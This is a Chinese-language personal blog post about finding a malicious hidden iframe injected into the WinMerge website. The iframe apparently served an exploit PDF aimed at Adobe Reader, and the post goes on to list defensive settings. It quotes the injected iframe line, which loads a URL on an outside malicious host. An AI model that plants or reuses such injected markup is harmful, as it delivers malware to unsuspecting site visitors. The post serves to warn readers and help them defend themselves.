前一陣子看網路新聞有看到,有網站在利用Adobe Reader的漏洞在使用者的電腦上安裝惡意軟體,上星期工作的時候真的遇到了,而且防毒軟體還沒有警告,幸好我的Adobe Reader已經有事先更新到最新版,所以沒有中毒。不過這讓我想要防患於未然,以免以後遇到Adobe Reader來不及更新的時候中招,尤其Adobe的程式的安全性更新的速度似乎不是很快,上次居然漏洞已經被利用了兩星期後才推出更新程式,所以自己先做好防範措施應該會更好。
事情是這樣發生的:上個星期在瀏覽WinMerge網站要檢查是否有新版程式更新的時候,突然跳出一個Adobe Reader,裡面有一個充滿亂碼的pdf檔案,而且這個檔案還要求執行JavaScript,一副就很可疑的樣子,檢視網頁的程式碼後發現有以下這一段被加入到網頁的最後面:(注意:底下的網址可能含有未知惡意程式,請不要因為好奇而手動開啟;而WinMerge的網頁在隔天再看就已經修復了)
<iframe src="http://betbigwager.cn/in.cgi?income61" style="visibility: hidden;" height="1" width="1">
所以顯然是因為那個iframe內含有惡意的pdf檔案,然後加上我以前設定為不「在瀏覽器中顯示PDF」(如下圖),才會看到這個檔案,否則依照Adobe預設的設定,檔案就可能在使用者看不到的地方開啟了。
另外為了以防萬一,我從網路上查詢了一些資料,上面有建議關閉Adobe Reader的「啟用Acrobat JavaScript」(如下圖),因為有些惡意軟體就是利用這個Script功能的漏洞執行的。
但是這樣還是不夠讓我覺得安心,所以我還在Firefox的「工具→附加元件→外掛程式」中,停用了Adobe Acrobat的plug-in,因為我可以把PDF檔案下載到電腦以後再開啟,沒必要直接在瀏覽器中開啟,所以關閉這個plug-in對我來說並沒有任何不便。
當然,一定會有人認為設定了那麼多東西還不如直接換一個PDF Viewer,這部份我有在嘗試一些替代方案,只是還不確定這些替代的程式是不是顯示結果正確美觀、功能好用、以及更安全,所以還是先這樣用吧。
